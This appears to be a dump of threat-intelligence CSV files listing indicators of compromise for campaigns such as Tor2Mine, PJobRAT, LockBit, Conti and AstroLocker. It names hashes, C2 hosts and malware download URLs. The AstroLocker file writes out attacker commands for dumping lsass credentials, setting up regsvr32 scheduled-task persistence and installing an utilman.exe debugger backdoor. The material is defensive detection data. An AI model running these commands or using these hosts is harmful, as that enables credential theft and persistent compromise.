url,http://mrbfile.xyz/PowerShellInstaller.exe, 62 | url,http://mrbfile.xyz/agenty.zip, 63 | url,http://mrbfile.xyz/agentz.zip, 64 | url,http://mrbfile.xyz/sql, 65 | url,http://mrbfile.xyz/sql/SqlServer.dll, 66 | url,http://mrbfile.xyz/sql/sqlServer.dll, 67 | url,http://mrbfile.xyz/sql/syslib.dll, 68 | url,http://mrbfile.xyz/sys.dll, 69 | url,http://mrbftp.xyz/sql/syslib.dll, 70 | url,http://vihansoft.ir/Agent.zip, 71 | url,http://vihansoft.ir/Agentx.zip, 72 | url,http://vihansoft.ir/Hostx.zip, 73 | url,http://vihansoft.ir/P.zip, 74 | url,http://vihansoft.ir/d.zip, 75 | url,http://vihansoft.ir/favicon.ico, 76 | 
url,http://vihansoft.ir/host.zip, 77 | url,http://vihansoft.ir/k.exe, 78 | url,http://vihansoft.ir/p.zip, 79 | url,http://vihansoft.ir/pack.zip, 80 | url,http://vihansoft.ir/sys.dll, 81 | url,http://54.36.10.77/linuxservice.tar.gz, 82 | -------------------------------------------------------------------------------- /Miner-Tor2Mine.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | domain,dns.msftncsi.comeu.minerpool.pw,C2 for Tor2Mine 3 | domain,eu.minerpool.pw,C2 for Tor2Mine (miner panel) 4 | domain,asq.d6shiiwz.pw,C2 for Tor2Mine 5 | domain,eu1.ax33y1mph.pw,C2 for Tor2Mine 6 | domain,pa.kl2a48yh.pw,C2 for Tor2Mine 7 | domain,asd.s7610rir.pw,C2 for Tor2Mine 8 | domain,asq.swhw71un.pw,C2 for Tor2Mine 9 | filename,java.exe,Tor2Mine miner variant (java.exe) 10 | filename,kallen.ps1,Mimikatz Powershell 11 | filename,check1.ps1,Persistence / installation script 12 | filename,checking.ps1,Persistence / installation script 13 | filename,del.ps1,competitive miner removal script 14 | ip,107.181.187.132,C2 for Tor2Mine variant 1 15 | ip,83.97.20.83,C2 for Tor2Mine variant 1 16 | ip,185.10.68.123,C2 for Tor2Mine (miner panel) 17 | ip,83.97.20.81,C2 for Tor2Mine 18 | sha256,b3af7ce4b4ee2f0fc8f44a6011cf35817bd82d6fcbb9ff15cb364f075b140e6a,Tor2Mine main dropper script variant 1 19 | sha256,413997e04e573b6035709852d7e82e25f7510ab9744e69eaea9edf17db546cc4,Tor2Mine miner variant (java.exe) 20 | sha256,b78571cdc8e361703fa144b9d1625d9f198bd85725cca70a70fccff6ab04477c,Tor2Mine main dropper script variant 2 21 | sha256,c1fc58d49031e17317613a2c29013253492a8ce63d126f6588f4345be41bc779,v1.exe Tor2Mine script dropper 22 | sha256,bdae90d511ca8b0be15fb05efd6ff4e530c945333ab8b4938c3d5c38143f2d6a,Tor2Mine 64-bit variant miner 23 | sha256,cdb0e63ea62e96836cdb6096b90bf812909cdc323ba3d98ee4561fa067a28030,Tor2Mine script dropper executable 24 | sha256,19fed775072fff292c8905473b7ca8fa072e29ecc8ea54d0373d1988d8f595e3,Tor2Mine 
del.ps1 25 | sha256,2e215eaa2f75db97677d10feac7b2f0c4b231f2729190d209964be2adddd1acd,Wscript/WMI spreader dropped in nested %TEMP% folders 26 | sha256,2bc17d049db076d9d590dd7fee6d2695e818de8a863a2281c241f2608d0154b2,check.hta Tor2Mine dropper script 27 | url,http://v1.fym5gserobhh.pw/php/func.php,Tor2Mine C2 remote code source 28 | url,http://eu1.minerpool.pw/upd.hta,Tor2Mine C2 remote code source 29 | url,http://asd.s7610rir.pw/win/checking.hta,Tor2Mine C2 remote code source 30 | url,http://107.181.187.132/test/32.exe,Tor2Mine 32-bit variant miner source 31 | url,http://107.181.187.132/del.bat,remote batch script 32 | url,http://res1.myrms.pw/upd.hta,Tor2Mine remote update script source 33 | url,https://qm7gmtaagejolddt.onion.to/check.hta,check.hta Tor2Mine dropper script source 34 | url, http://107.181.187.132/test/64.exe,Tor2Mine 64-bit variant miner source 35 | url,http://asq.d6shiiwz.pw/win/checking.ps1,Persistence / installation script 36 | url,http://83.97.20.81/win/checking.ps1,Persistence / installation script 37 | url,https://pa.kl2a48yh.pw/upd.hta,Persistence / update script 38 | -------------------------------------------------------------------------------- /MoDi-RAT-reflective-injection.csv: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note, 2 | Description,Indicators for MoDi RAT malware reflective loader attack,https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands, 3 | md5,695b21032e1ba37affa4f13d525798f9869ea794,initial VBE, 4 | md5,0449ae73074153195368cfefd910946d540e59ff,dropped VBS, 5 | domain,mondns.myftp.org,C2, 6 | md5,00c8144d988385ad0d44a8871044185fa9bb78e4,Decoder .Net, 7 | md5,17b85597c55e99d09c8ad5cf9631f0f1d5d82d0e,Injector .Net, 8 | md5,a7967f4f66d4f9d3ac7187cab601abdc47e1c6c0,MoDi RAT, 9 | md5,79bcda484419f0adc9648b581b10498c8415d89a,MoDi RAT, 10 | url,http://vanesaescribano.com/services/coaching-personal,Redirect link from spam, 
11 | url,http://phix.es/impots-center,secondary 302 redirect link, 12 | ,,, 13 | ,,, 14 | ,,, 15 | ,,, 16 | ,,, 17 | ,,, 18 | ,,, 19 | ,,, 20 | ,,, 21 | ,,, 22 | ,,, 23 | ,,, 24 | ,,, 25 | ,,, 26 | ,,, 27 | ,,, 28 | ,,, 29 | ,,, 30 | ,,, 31 | ,,, 32 | ,,, 33 | ,,, 34 | ,,, 35 | ,,, 36 | ,,, 37 | ,,, 38 | ,,, 39 | -------------------------------------------------------------------------------- /OWASSRF IOCs 2023-03.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/03/15/observing-owassrf-exploitation/ ‎,Indicators of OWASSRF exploitation Mar-2023 3 | IP,217.79.243[.]148,C2 Server 4 | IP,38.135.122[.]130,C2 Server 5 | url,devoterfo[.]com,C2 Server 6 | file_path,C:\programdata\komar65.dll,malware; numbers apparently randomly generated and assigned 7 | file_path,C:\programdata\add64s.exe,malware 8 | file_path,c:\programdata\addp.dll,malware 9 | file_path,C:\Windows\Temp\sophos_k.exe,attempts to disable Sophos protections 10 | file_path,C:\Windows\Temp\kk65.bat,malicious driver 11 | file_path,C:\Users\Mysql\AppData\Local\Temp\dRVag.sys,malicious driver 12 | IP,179.60.149[.]28,C2 Server 13 | IP,141.98.9[.]4,C2 Server 14 | IP,91.191.209[.]222,C2 Server 15 | IP,104.238.187[.]145,C2 Server 16 | IP,45.77.101[.]240,C2 Server 17 | IP,192.53.123[.]202,C2 Server 18 | IP,206.125.147[.]98,C2 Server 19 | file_path,C:\ProgramData\pta.exe,renamed copy of PuTTy Link 20 | -------------------------------------------------------------------------------- /PJobRAT_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | Description,IOCs related to PJobRAT campaigns 2022-2024,https://news.sophos.com/en-us/2025/03/27/pjobrat-makes-a-comeback-takes-another-crack-at-chat-apps/ 3 | sha256,0ad9cd56764ef70bdfbd3b2d269020557135f075d63327dbaab1bf0e9d816fb5,org.complexy.hard 4 | 
sha256,0ebcfbcda27b84b8f0db6d50abb1b0ff7831938913912156d27880704e69f1f2,com.happyho.app 5 | sha256,37c390ff137ac71004223c73b99a9d8eec8ae2e879dee679bda29c09e1b11a37,sa.aangal.lite 6 | sha256,44a05d1e36938c0d6039e0986de91744482d86d641d1d981f3e8a61385fb33a3,net.over.simple 7 | filename,org.complexy.hard ,PJobRAT package 8 | filename,com.happyho.app,PJobRAT package 9 | filename,sa.aangal.lite,PJobRAT package 10 | filename,net.over.simple,PJobRAT package 11 | domain,westvist.myftp.org,C2 server 12 | domain_port,westvist.myftp.org:8181,C2 server 13 | domain_port,westvist.myftp.org:3574,C2 server 14 | url_path,http://westvist.myftp.org:8181/socket.io/?EIO=4&transport=websocket,C2 server 15 | url_path,http://westvist.myftp.org:3574/notification/chat_notification_v2.php,C2 server 16 | url_path,http://westvist.myftp.org:3574/m_chowa_srv/main.php,C2 server 17 | domain,toolkitapi.xyz,Domain hosting PJobRAT 18 | domain,itechcube.xyz,Domain hosting PJobRAT 19 | domain,dependablework.wordpress.com,Domain hosting PJobRAT 20 | domain,lifestylespractice.wordpress.com,Domain hosting PJobRAT 21 | -------------------------------------------------------------------------------- /PUA-QuickCPU_xmr-stak.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs from https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, 3 | sha256,54a37cc18dae575965f73cc260cedf5b2d4e356ab53070cc3577c6d0bf125211 ,QuickCPU.dat 4 | sha256,4324ba1ca3a4db940dee5de14644e31268df081047b2681b8e33a1f3da7bae9a,QuickCPU.exe (old version) 5 | sha256,3dabd3bf16f5856d504d0ae20d3d3c9c6c74ccee562964292bb4565dda91a0e8,QuickCPU.exe (new version) 6 | sha256,6539bbb8cbf33b050d544283f51ccc52ec040b62e3c706d20bd0fe4e221212e3 ,run.bat (old) 7 | sha256, 3ad9da14e7f7e68e31d6cb6a8cab13e1eb45cb147371edbf0e4ed3e5262b9f51 ,run.bat (new) 8 | 
-------------------------------------------------------------------------------- /Pacific_Rim_Asnarok_iocs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | description,Indicators from Asnarok attack documented in Pacific Rim Report,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/ 3 | domain,sophosfirewallupdate.com,Observed in Asnarök CVE 2020-12271 Attack (MITRE ATT&CK Tactic: execution) 4 | domain,43.229.55.44,sophosfirewallupdate.com 5 | asn,AS 63888 (DATAWINGLIMITED-AS DATAWING LIMITED),43.229.55.44/sophosfirewallupdate[.]com 6 | filename,install.sh ,Downloaded from sophosfirewallupdate[.]com (MITRE ATT&CK Tactic: Execution) 7 | registrar,"Wild West Domains, LLC",Registrar for sophostraining[.]org Domains 8 | registrar,"GoDaddy.com, LLC",Registrar for 6 Asnarök Domains 9 | domain,filedownloaderservers.com,Asnarök Domains 10 | domain,sophosenterprisecenter.com,Asnarök Domains 11 | domain,sophoswarehouse.com,Asnarök Domains 12 | domain,sophosproductupdate.com,Asnarök Domains 13 | domain,sophostraining.org,Asnarök Domains 14 | domain,ragnarokfromasgard[.]com,Observed in Asnarök CVE 2020-12271 Attack (MITRE ATT&CK Tactic: execution) 15 | asn,AS 60117 ( Host Sailor Ltd ),ragnarokfromasgard[.]com -------------------------------------------------------------------------------- /Pacific_Rim_CVE-2020-15069_IOCs.csv: -------------------------------------------------------------------------------- 1 | indicator,Data,Notes,,,,, 2 | description,Indicators from Bookmark feature attack (CVE-2020-15069) documented in Pacific Rim Attack,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/,,,,, 3 | md5,8a721d68f181c2274c3bb3f34cb492ed,Hash of Perl web shell (MITRE ATT&CK Tactic: Persistence),,,,, 4 | filename,patch.sh ,"Disables hotfix on devices, running at 5-minute intervals (MITRE ATT&CK Tactic: Impact)",,,,, 5 | filename,IC.sh,Collected and exfiltrated user account data (MITRE 
ATT&CK Tactic:Exfiltration),,,,, 6 | sha1,9a5ed7a3319e99698cb7f3a4b98ccb1dd19202b8,patch.sh (MITRE ATT&CK Tactic: Impact),,,,, 7 | sha1,be18ca11b18cee2764b25cb61c6e8f1ead9fa1f6,IC.sh ((MITRE ATT&CK Tactic: Exfiltration),,,,, 8 | ip_port,182.16.103.91:90,IP contacted by IC.sh (MITRE ATT&CK Tactic: Exfiltration),,,,, -------------------------------------------------------------------------------- /Pacific_Rim_Covert_Channels_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes, 2 | description,"Indicators from ""Covert Channels"" (CVE-2022-3236) attacks documented in Pacific Rim Report",: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/, 3 | tool,Chisel,Open-source network tunneling tool built in Go (MITRE ATT&CK Tactic: Command and Control),Command and Control 4 | tool,fscan,Open-source network scanner built in Go (MITRE ATT&CK Tactic: Discovery),Discovery 5 | tool,zscan,Open-source network scanner built in Go (MITRE ATT&CK Tactic: Discovery),Discovery 6 | ip,192.241.152.245,iHEpkSYD process (MITRE ATT&CK Tactic: Command and Control),Command and Control 7 | ip,172.67.163.48,v64 process (MITRE ATT&CK Tactic: Command and Control),Command and Control 8 | ip,104.21.41.84,v1 process (MITRE ATT&CK Tactic: Command and Control),Command and Control 9 | filename,v64,Believed to be C2 (MITRE ATT&CK Tactic: Command and Control),Command and Control 10 | filename,v1,Believed to be C2 (MITRE ATT&CK Tactic: Command and Control),Command and Control 11 | filename,f,Fscan (https://github.com/shadow1ng/fscan) (MITRE ATT&CK Tactic: Discovery),Discovery 12 | filename,c,Chisel (https://github.com/jpillora/chisel) (MITRE ATT&CK Tactic: Command and Control),Command and Control 13 | filename,z,z (https://github.com/zyylhn/zscan) (MITRE ATT&CK Tactic: Discovery),Discovery 14 | filename,iHEpkSYD,Believed to be C2, 15 | filename,sophos-fix.jar,Malicious Jar file (MITRE ATT&CK Tactic: Persistence),Persistence 16 | 
filename,SophosAgent.jar,Malicious Jar file (MITRE ATT&CK Tactic: Persistence),Persistence 17 | md5,edeabb6b21bbae30491a7f1ad8cf374b,v1 process (MITRE ATT&CK Tactic: Command and Control),Command and Control 18 | md5,89ae36448f1922870f1a09c29f17c775,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 19 | md5,2c1397f61325d3ab7eee97124ed8dcfa,Chisel (MITRE ATT&CK Tactic: Command and Control),Command and Control 20 | md5,50b42f796774f925d9bb4b05ec50dffb,sophos-fix.jar (MITRE ATT&CK Tactic:Persistence),Persistence 21 | md5,9bd5e3bd9ca3785b82a767c6b02d74e1,SophosAgent.jar r (MITRE ATT&CK Tactic:Persistence),Persistence 22 | md5,c62ab7e7f5e6cbc04244a76d4adeef16,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 23 | sha1,4bf1211a59638a6510aaa328d5dfef96807426b5,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 24 | sha1,3b1329e81739b1ea6acbb4ec4dff11f02ff42570,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 25 | sha1,bc8bbe7786216e648a914809cc971012023861aa,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 26 | sha1,253d262afbf76c6e89d48c00bfbc94f987d05c41,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 27 | sha1,2416700a102184f78ccc79c6802ba4c906f0e0ac,Fscan (MITRE ATT&CK Tactic: Discovery), 28 | sha1,8b0118e9b9b8b686592152500c9c066ffe495ea7,Fscan (MITRE ATT&CK Tactic: Discovery),Discovery 29 | sha1,01833e8f02858aa6ebb91136478c4d1031e809dd,Chisel (MITRE ATT&CK Tactic: Command and Control),Command and Control 30 | sha1,a40e9c97e4e49f7e1fec1972a8a3420020d5c985,Zscan (MITRE ATT&CK Tactic: Discovery),Discovery 31 | sha1,1157c3cbe87405459dc6523ea10bac1d553c379e,Chisel (MITRE ATT&CK Tactic: Command and Control),Command and Control 32 | asn,CLOUDFLARENET,ASN of 104.21.41.84 & 172.67.163.48 ((MITRE ATT&CK Tactic: Command and Control),Command and Control 33 | asn,DIGITALOCEAN-ASN,ASN of 192.241.152.245 (MITRE ATT&CK Tactic: Command and Control),Command and Control -------------------------------------------------------------------------------- /Pacific_Rim_Cyberoam_acct_IOCs.csv: 
-------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,,, 2 | description,Indicators from Cyberoam account creation attack documented in Pacific Rim Report,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/,,,,, 3 | user_account,cyberadmin,Admin account added via CVE-2020-29574 0-day (MITRE ATT&CK Tactic: Persistence),Persistence,,,, 4 | user_account,cyberoam_managed,Admin account added via CVE-2020-29574 0-day (MITRE ATT&CK Tactic: Persistence),Persistence,,,, 5 | user_account,cybersupport,Admin account added via CVE-2020-29574 0-day (MITRE ATT&CK Tactic: Persistence),Persistence,,,, -------------------------------------------------------------------------------- /Pacific_Rim_Defending_Forward_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,,, 2 | description,Indicators from defemding forward investigations documented in Pacific Rim Report,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/,,,,, 3 | filename,hijack-x86,File present in /tmp directory,,,,, 4 | filename,rt0510-x86,File present in /tmp directory (MITRE ATT&CK Tactic: Command and Control),,,,, 5 | tool,Suterusu,Open source LKM Linux rootkit (MITRE ATT&CK Tactic: Defense Evasion),,,,, 6 | ip_port,59.188.69.231:4438,Connections observed via UDP from rt0510-x86 binary (MITRE ATT&CK Tactic: Command and Control),,,,, 7 | ip_port,59.188.69.231:4439,Connections observed via UDP from rt0510-x86 binary (MITRE ATT&CK Tactic: Command and Control),,,,, 8 | asn,AS 17444 (HKBN Enterprise Solutions Limited),59.188.69.231 (MITRE ATT&CK Tactic: Command and Control),,,,, 9 | filename,libxselinux.so,Detected as Linux/Winnti-T (MITRE ATT&CK Tactic: Defense Evasion),,,,, 10 | sha1,62b690d29808f701b7e30291734a66d78c9cff39,libxselinux.so (MITRE ATT&CK Tactic: Defense Evasion),,,,, -------------------------------------------------------------------------------- 
/Pacific_Rim_Personal_Panda_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes,,,, 2 | description,Indicators from Personal Panda attack documented in Pacific Rim Report,: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/,,,, 3 | filename,libsophos.so ,Userland rootkit which injected into SSH daemon via LD_PRELOAD env variable (MITRE ATT&CK Tactic: Defense Evasion),,,, 4 | md5,c71cd27efcdb8c44ab8c29d51f033a22,libsophos.so (MITRE ATT&CK Tactic: Defense Evasion),,,, 5 | filename,libgoat.so,Renamed libsophos.so observed on attacker's development machine (MITRE ATT&CK Tactic: Defense Evasion),,,, 6 | sha1,dc64bbdcb4ce0c2c49bb681de35f181f096dee30,Gh0stRat (MITRE ATT&CK Tactic: Defense Evasion),,,, 7 | ip,192.248.152.58,"Seen in Volexity DriftingCloud article, used to download Python script to exploit CVE-2021-4034 (MITRE ATT&CK Tactic: Execution)",,,, 8 | asn,AS 20473 ( AS-CHOOPA ),ASN of 192.248.152.58 ((MITRE ATT&CK Tactic: Execution),,,, 9 | filename,libiculxg.so ,Sliver C2 framework implant ((MITRE ATT&CK Tactic: Execution),,,, 10 | sha1,7b1e16548265fe4ef9e882af7f1fdf336d072b5a,libiculxg.so (MITRE ATT&CK Tactic: Execution),,,, 11 | -------------------------------------------------------------------------------- /Pacific_Rim_Under_The_Radar_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Notes 2 | description,"Indicators from ""Under the Radar"" attacks documented in Pacific Rim Report",: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/ 3 | filename,XG210-rkloadtest.bin,UEFI BIOS bootkit based on VectorEDK (MITRE ATT&CK Tactic: Defense Evasion) 4 | tool,LCX,Open-source port mapping tool 5 | tool,Microsocks,Open source SOCKS5 proxy tool built in C (MITRE ATT&CK Tactic: Command and Control) 6 | md5,713F088F02B060F6BBED3C243780E808,ELF Backdoor (MITRE ATT&CK Tactic: Defense Evasion) 7 | 
sha1,74b0fbbb8cb42609eab31d7abcb05515a271e721,File obfuscated with go-strip (MITRE ATT&CK Tactic: Command and Control) 8 | tool,sdb,Netcat clone with enhanced feature set (encrypted comms) (MITRE ATT&CK Tactic: Execution) 9 | tool,PLTHook,Open-source tool to hook function calls by replacying PLT enteries 10 | tool,FRP,Open-source reverse proxy built in Go (MITRE ATT&CK Tactic: Command and Control) 11 | sha1,56e233cebc7f83b48b5cfc947bbbf8f274677305,nasm binary (MITRE ATT&CK Tactic: Persistence) 12 | sha1,65fc7268778ff81d93b4f368bdb19899ce834998,sdb hash (MITRE ATT&CK Tactic: Command and Control) -------------------------------------------------------------------------------- /Ransom-Lockbit_20220412.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Lockbit ransomware attacks,https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/ 3 | sha256,6684e1df360db67719f65bcd39467cc88bbd7bb910636d03071245b622e7cfa3,Advanced Port Scanner 4 | sha256,87bfb05057f215659cc801750118900145f8a22fa93ac4c6e1bfd81aa98b0a55,Advanced Port Scanner 5 | sha256,4a9dde3979c2343c024c6eeeddff7639be301826dd637c006074e04a1e4e9fe7,Anydesk 6 | sha256,db385ea6858db4b4cb49897df9ec6d5cc4675aaf675e692466b3b50218e0eeca,"Mimikatz (ATK/Mimikatz-AE) 7 | " 8 | sha256,3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a,Mimikatz mimispool.dll/mimilib.dll (ATK/Mimikatz-BE) 9 | sha256,0d31a6d35d6b320f815c6ba327ccb8946d4d7f771e0dcdbf5aa8af775576f2d1,Mimikatz mimilove.exe (ATK/Mimikatz-BE) 10 | sha256,83d7f6eaf7fe075503ea6a0bc726633c34595a6eae7edd7deab95ab4d4a66fd5,NLBrute (Mal/VMProtBad-A) 11 | sha256,46367bfcf4b150da573a74d91aa2f7caf7a0789741bc65878a028e91ffbf5e42,Process Hacker 12 | sha256,89904c4d3b1ebbdfd294b1a87940400a2db2ead01b3d6e3e2e151481faae95bd,ScreenConnect 13 | 
sha256,ffbb5241ed488b98725013185c80f40156d32884a87d6898d53e2aef28f1c3f8,ScreenConnect 14 | url,rdpguard[.]com/download.aspx, 15 | url,hXXps://cryptobrowser.site/, 16 | url,hXXps://hanner-blobal[.]com, 17 | url,hXXps://aapu.xyz, 18 | url,hXXps://rinryesop.one, 19 | -------------------------------------------------------------------------------- /Ransomware-AstroLocker.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to Astro Locker ransomware,https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/ 3 | command,C:\Windows\SysWow64\NOTEPAD.EXE C:\Windows\locker_64.dll.log , 4 | command,makecab lsass.dmp lsass.dmp.cab , 5 | command,procdump64.exe  -accepteula -ma lsass.exe lsass.dmp , 6 | command,"rundll32.exe  locker_64.dll,DllRegisterServer /SCAN:L ", 7 | command,"rundll32.exe  locker_64.dll,DllRegisterServer ", 8 | command,"schtasks  /Create /RU \ /SC DAILY /ST 03:42 /TN ""updater"" /TR ""regsvr32.exe /i C:\Users\\AppData\wininit64.dll"" /F ", 9 | command,taskhost.exe regsvr32.exe /i C:\Users\\AppData\wininit64.dll , 10 | domain,139.60.161.68 ,Cobalt Strike 11 | domain,185.38.185.87,IcedID 12 | domain,45.134.21.8,Cobalt Strike 13 | domain,46.21.153.135,Cobalt Strike 14 | domain,albanallahacrab.club,IcedID 15 | domain,dclogictrust.com ,Cobalt Strike 16 | domain,masskwearing.cyou,IcedID 17 | domain,padishahmurrka.best,IcedID 18 | domain,uragusexgre.club,IcedID 19 | filename,locker_64.dll,Mount Locker ransomware 20 | filename,RecoveryManual.html ,Ransom note 21 | filename,wininit64.dll,RDP backdoor 22 | service,%COMSPEC% /C echo copy c:\\wininit64.dll c:\\Users\\\\appdata ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\jEmLSzCoDrwddqjU.txt > \\WINDOWS\\Temp\\LtWMjPKPlFsUiCKD.bat & %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\LtWMjPKPlFsUiCKD.bat,Named with random 16-digit string 23 | service,%COMSPEC% /C echo REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Image File Execution Options\\utilman.exe /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\DDEjIHhcFicEzhmu.txt > \\WINDOWS\\Temp\\mchdhcdhpdBvOxXF.bat & %COMSPEC% /C start %COMSPEC% /C \\WINDOWS\\Temp\\mchdhcdhpdBvOxXF.bat,Named with random 16-digit string 24 | service,%COMSPEC% /C echo dir c:\\ ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\xJqUhSaZPqxAjHzn.txt > \\WINDOWS\\Temp\\mOWsUypRQFwlZMkF.bat & %COMSPEC% /C start %COMSPEC% /C,Named with random 16-digit string 25 | service,%COMSPEC% /C echo whoami ^> %SYSTEMDRIVE%\\WINDOWS\\Temp\\FaUocMGJjmCAbJMr.txt > \\WINDOWS\\Temp\\uxvbnnSkrkOMnsJg.bat & %COMSPEC% /C start %COMSPEC% /C,Named with random 16-digit string 26 | sha256,0a671d9d7ca62274e5e210813d02d860846baf59188e2a07522cd3a1cc3f9cc0 ,RDP backdoor 27 | sha256,2c44444d207a78da7477ae1af195d4265134e895bebb476f7b2c003f1467a033 ,Mount Locker ransomware DLL 28 | scheduled task,regsvr32.exe /i C:\Users\\AppData\wininit64.dll,Name: updater  29 | scheduled task,regsvr32.exe /i C:\Program Files\Google\Drive\wininit64.dll,Name: updater  30 | scheduled task,regsvr32.exe /i C:\AMD\WU-CCC2\ccc2_install\wininit64.dll,Name: regsvr32 31 | -------------------------------------------------------------------------------- /Ransomware-BlackByte.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs related to BlackByte ransomware,https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/ 3 | sha256,01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd,RTCore64.sys driver 4 | sha256,9103194d32a15ea9e8ede1c81960a5ba5d21213de55df52a6dac409f2e58bcfe,BlackByte v2 packed sample 5 | -------------------------------------------------------------------------------- /Ransomware-Conti.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs from the Conti ransomware 
report,https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/ 3 | domain,docns.com,Cobalt Strike C2 4 | domain,tapavi.com,Cobalt Strike C2 5 | domain,contirecovery.best, 6 | url_path,/Menus.aspx,Used by Cobalt Strike component. Source: https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/trevor.profile 7 | url_path,/menus.aspx,Used by Cobalt Strike component. Source: https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/trevor.profile 8 | url_path,/us/ky/louisville/312-s-fourth-st.html,Used by Cobalt Strike component. Source: https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/trevor.profile 9 | ip,23.106.160.174,resolved docns.com 10 | ip,23.82.140.137,resolved tapavi.com 11 | sha256,3b375dcda1f6019d986de1f7ae3458657e623c4f401c121e660add55d36a9e8c,backup.dll (Cobalt Strike component) 12 | sha256,4e3d8806e6c9ba334166f12ffe4e27dbde203425c882fccf1e452f77355b7d25,backup.dll (Cobalt Strike component) 13 | sha256,e974c09f204b99bfcdeb9fe4a561a28e064c612132829919f8b99a838c2b2106,backup.dll (Cobalt Strike component) 14 | sha256,af218e34e12216d56e5c6c86704804866100aa09ccb9160bc4029492c3f1f959,x64.dll (Cobalt Strike component) 15 | sha256,591677b54eb556e7e840670eccb2d62434e336af6d3908394d17cb26e99c4733,s1.dll (Cobalt Strike component) 16 | MD5,C7BCB3B84244A22E6EE9699CFBD86DC9F27FC677,doc.dll (Cobalt Strike component) 17 | sha256,2d3b859f2ad3f0e296fd29c1abc5eb80b4dabe7c0b9d9a3b44821c9ed8e015b1,aa64.dll (Cobalt Strike component) 18 | sha256,63625702e63e333f235b5025078cea1545f29b1ad42b1e46031911321779b6be,conti.exe (ransomware payload) 19 | -------------------------------------------------------------------------------- /Ransomware-Dharma-RaaS.csv: -------------------------------------------------------------------------------- 1 | Indicator_Type,Data,Note, 2 | Description,Indicators from Dharma RaaS attacks,, 3 | file_path_name,\\tsclient\e,Network mounted drive for Dharma RaaS attacks via RDP, 4 | 
file_path_name,\\tsclient\e\ps\,Powershell directory for Dharma RDP RaaS attack, 5 | file_path_name,\\tsclient\e\torqNet\,Tor tools for Dharma RDP RaaS attack, 6 | file_path_name,\\tsclient\e\ms16\,, 7 | file_path_name,\\tsclient\e\mimikatz_trunk\x64,64-bit Mimikatz files for Dharma RDP RaaS, 8 | file_path_name,\\tsclient\e\mimikatz_trunk\Win32,32-bit Mimikatz files for Dharma RDP RaaS, 9 | file_path_name,\\tsclient\e\Password Viewers\,Password viewers for Dharma RDP RaaS, 10 | file_path_name,\\tsclient\e\rdpv,RDP Password Viewer files for Dharma RDP RaaS, 11 | file_path_name,\\tsclient\e\Lazagne,LaZagne password scraper files for Dharma RDP RaaS, 12 | file_path_name,\\tsclient\e\Hash_Suite_Free\Tools,Hash Suite Free files for Dharma RDP RaaS, 13 | file_path_name,\\tsclient\e\1SafeMode,, 14 | file_path_name,\\tsclient\e\SafeCrypt\,, 15 | file_path_name,\\tsclient\e\PCHunter\,, 16 | file_path_name,\\tsclient\e\exe\,, 17 | file_path_name,\\tsclient\e\RegistryFinder\,, 18 | file_path_name,\\tsclient\e\x\,, 19 | file_path_name,\\tsclient\e\torqNet\,, 20 | file_path_name,\\tsclient\e\AdvancedIPScanner\,, 21 | file_path_name,\\tsclient\e\WmiDomain\,, 22 | file_path_name,\\tsclient\e\2fin\,, 23 | file_path_name,\\tsclient\e\bat\,, 24 | file_path_name,\\tsclient\e\2018\,, 25 | file_path_name,\\tsclient\e\mimiNLbrute\,, 26 | file_path_name,\\tsclient\e\miadnlrdp\,, 27 | sha1,1bfb9bf7a00b8b6e9a0a7eb8fcf9c69738562d3f,Initial Dharma RaaS compromise script, 28 | file_name,toolbelt.ps1,Main attack script, 29 | file_name,elevate.ps1,Privelege escalation script, 30 | file_name,LApass.ps1,Dharma user changer script, 31 | file_name,lubrute.ps1,Dharma local user brute force attack, 32 | file_name,Find-Pass.ps1,, 33 